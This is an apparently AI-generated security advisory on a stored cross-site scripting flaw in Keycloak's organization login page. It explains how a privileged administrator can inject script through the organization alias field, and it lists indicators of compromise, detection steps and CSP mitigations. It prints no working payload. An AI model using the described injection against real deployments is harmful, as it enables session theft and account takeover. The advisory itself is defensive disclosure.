CVE-2026-37980 Overview
A Stored Cross-Site Scripting (XSS) vulnerability has been identified in Keycloak's organization selection login page. This flaw allows a remote attacker with manage-realm or manage-organizations administrative privileges to inject malicious JavaScript payloads that execute in victims' browsers when they view the affected login page.
The vulnerability exists because the organization.alias value is placed directly into an inline JavaScript onclick handler without proper sanitization. When users interact with the compromised login page, the crafted JavaScript payload executes within their browser context, potentially leading to session theft, unauthorized account actions, or further attacks against users of the affected realm.
Critical Impact
Successful exploitation enables arbitrary JavaScript execution in authenticated user sessions, potentially compromising session tokens and enabling account takeover within the affected Keycloak realm.
Affected Products
- Keycloak (specific versions not disclosed in advisory)
- Red Hat Single Sign-On (based on Keycloak)
- Downstream products utilizing Keycloak authentication
Discovery Timeline
- April 14, 2026 - CVE-2026-37980 published to NVD
- April 14, 2026 - Last updated in NVD database
Technical Details for CVE-2026-37980
Vulnerability Analysis
This Stored XSS vulnerability (CWE-79) stems from improper neutralization of user-controlled input in web page generation. The vulnerability resides in Keycloak's organization selection functionality on the login page, where the organization.alias field is embedded directly into an inline JavaScript onclick event handler.
When an administrator with manage-realm or manage-organizations privileges creates or modifies an organization, they can inject a malicious JavaScript payload into the alias field. This payload is stored in the Keycloak database and subsequently rendered to any user who accesses the login page for that realm, executing the attacker's script in the victim's browser context.
The attack requires elevated administrative privileges to inject the payload, but the impact extends to all users who subsequently access the compromised login page. This scope escalation is reflected in the changed scope designation, indicating that the vulnerability affects resources beyond the vulnerable component's security authority.
Root Cause
The root cause is insufficient input validation and output encoding when processing the organization.alias parameter. The application fails to properly sanitize this value before embedding it within an inline JavaScript context. Specifically, the alias value is concatenated directly into an onclick handler attribute without HTML entity encoding or JavaScript string escaping, allowing special characters to break out of the string context and execute arbitrary JavaScript.
Attack Vector
An attacker with administrative privileges (manage-realm or manage-organizations) can exploit this vulnerability through the following mechanism:
- The attacker authenticates to Keycloak with an account possessing administrative privileges over realm or organization management
- The attacker creates or modifies an organization, injecting a crafted JavaScript payload into the organization.alias field
- The malicious payload is stored in the Keycloak database
- When any user visits the login page containing the organization selector, the payload is rendered within an inline onclick handler
- User interaction with the affected element triggers JavaScript execution in the victim's browser context
The malicious payload could be designed to steal session cookies, capture credentials, perform actions on behalf of the user, or redirect users to phishing pages. For additional technical details, refer to the Red Hat CVE-2026-37980 Advisory and Red Hat Bug #2455325 Report.
Detection Methods for CVE-2026-37980
Indicators of Compromise
- Unusual JavaScript code patterns in organization.alias fields within the Keycloak database
- Organization aliases containing HTML special characters, script tags, or event handler syntax such as ', ", <, >, (, ), or javascript:
- Unexpected network requests originating from users' browsers during login page interactions
- Reports of suspicious browser behavior or redirects when accessing Keycloak login pages
Detection Strategies
- Implement Content Security Policy (CSP) headers to detect and block inline script execution attempts
- Monitor Keycloak audit logs for organization creation and modification events by administrative accounts
- Deploy web application firewalls (WAF) with XSS detection rules to identify malicious payloads in HTTP responses
- Conduct periodic database audits to identify potentially malicious content in organization configuration fields
Monitoring Recommendations
- Enable verbose logging for administrative actions within Keycloak realms and organizations
- Configure alerting for unusual patterns in organization alias modifications
- Implement browser-side monitoring through SentinelOne's browser extension capabilities to detect XSS execution attempts
- Review authentication logs for anomalous session behavior that may indicate successful exploitation
How to Mitigate CVE-2026-37980
Immediate Actions Required
- Audit all existing organization aliases in affected Keycloak instances for potentially malicious content
- Review administrative access to identify accounts with manage-realm or manage-organizations privileges and verify their legitimacy
- Implement Content Security Policy headers with strict inline script restrictions as a defense-in-depth measure
- Consider temporarily restricting organization management capabilities until patches are applied
Patch Information
Consult the Red Hat CVE-2026-37980 Advisory for official patch information and updated Keycloak versions that address this vulnerability. Monitor the Red Hat Bug #2455325 Report for ongoing remediation status and specific version details.
Organizations should prioritize applying vendor-provided security updates that implement proper input validation and output encoding for the organization.alias field.
Workarounds
- Implement strict Content Security Policy headers that prevent inline script execution: script-src 'self' without 'unsafe-inline'
- Restrict administrative access by enforcing the principle of least privilege for manage-realm and manage-organizations roles
- Deploy a web application firewall (WAF) with XSS filtering rules in front of Keycloak instances
- Sanitize existing organization aliases by reviewing and removing any suspicious characters or JavaScript-like syntax from the database
# Example CSP header configuration for Apache/Nginx to mitigate XSS
# Apache httpd.conf or .htaccess
Header set Content-Security-Policy "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; frame-ancestors 'self';"
# Nginx configuration
add_header Content-Security-Policy "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; frame-ancestors 'self';" always;
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
